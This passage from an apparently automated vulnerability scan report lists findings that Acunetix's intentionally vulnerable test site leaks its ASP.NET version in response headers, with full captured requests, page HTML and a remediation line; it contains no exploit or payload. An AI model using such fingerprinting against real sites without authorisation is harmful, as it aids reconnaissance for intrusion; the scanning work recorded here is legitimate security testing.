href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        12. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
